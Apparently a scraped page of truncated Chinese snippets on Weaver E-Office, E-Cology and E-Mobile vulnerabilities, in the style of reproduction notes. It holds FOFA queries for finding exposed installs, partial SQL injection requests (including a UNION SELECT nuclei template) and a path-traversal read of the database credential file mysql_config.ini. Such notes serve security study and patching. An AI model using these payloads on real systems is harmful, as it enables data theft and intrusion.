近日,微步在线获取到泛微 E-office SQL注入漏洞和文件包含漏洞相关漏洞情报,攻击者可利用 SQL 漏洞获取...
ERPNext-SQL-注入漏洞复现 Exchange-漏洞利用 F5-BIG-IP-RCE-CVE-2023-46747-漏洞分析复现-先知社区 F5-BIG-IP身份验证绕过漏洞-CVE-2023-46747-分析 FH-Admin-Shiro反序列化漏洞复现 FLask-SSTI从零到入门 FastJson结合二次反序列化绕过黑名单-先知社区 Fastcgi-协议分析与-PHP-FPM-攻击方法-先知...
泛微E-Office 协同办公平台/E-mobile/App/Init.php接口存在SQL注入漏洞,攻击者可利用该漏洞执行任意SQL语句,进行增、删、改、查等数据库操作,造成数据库敏感数据信息泄露或被篡改; 漏洞复现 fofa语法:app="泛微-EOffice" 登录页面如下: POC: POST /E-mobile/App/Init.php?m=getSelectList_Crm HTTP/1.1Host:Us...
nuclei批量yaml文件 id:eoffice_flow_xml_sqliinfo:name:泛微E-Officeflow_xml.phpSQL注入漏洞author:mhb17severity:criticaldescription:descriptionreference:-https://tags:sqlirequests:-raw:-|+ GET /general/system/workflow/flow_type/flow_xml.php?SORT_ID=1%20union%20select%201,(md5(7)),3,4,5,6,1,...
漏洞描述 泛微E-Office mysql_config.ini文件可直接访问,泄漏数据库账号密码等信息 漏洞影响 泛微E-Office FOFA app="泛微-EOffice" 漏洞复现 产品页面 验证POC /mysql_config.ini What are your Feelings 更新于 2022年10月1日 泛微OA E-Office group_xml.php SQL注入漏洞泛微OA E-Office officeserver...
泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞.md 泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞.md 泛微E-Mobile-client.do存在命令执行漏洞.md 泛微E-Mobile-messageType.do存在命令执行漏洞.md 泛微E-MobileServer远程命令执行漏洞.md 泛微E-Mobile硬编码口令漏洞(XVE-2024-2...
泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞.md 泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞.md 泛微E-Mobile-client.do存在命令执行漏洞.md 泛微E-Mobile-messageType.do存在命令执行漏洞.md 泛微E-MobileServer远程命令执行漏洞.md 泛微E-Mobile系统接口cdnfile存在任意文件读取...
getFolderZtreeNodes.php存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息 漏洞复现 fofa语法:app="泛微-EOffice" 登录页面如下: POC: POST/general/system/file_folder/purview_new/getFolderZtreeNodes.php HTTP/1.1Host:User-Agent: Mozilla/5.0(Windows NT10.0; Win64; x64) AppleWebKit/537.36(KHTML,like...
系统json_common.php 文件存在SQL注入漏洞 漏洞复现 fofa语法:app="泛微-EOffice" 登录页面如下: POC: POST /building/json_common.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Content-Length: 83Connection: closeContent-Type: application/x-www...
泛微e-office officeserver2.php文件存在任意文件读取漏洞,攻击者可利用该漏洞读取服务器任意文件,获取服务器敏感信息。 影响版本 <= e-office 10.x 漏洞复现 fofa语法:app="泛微-EOffice" 登录页面如下: POC:/iweboffice/officeserver2.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini ...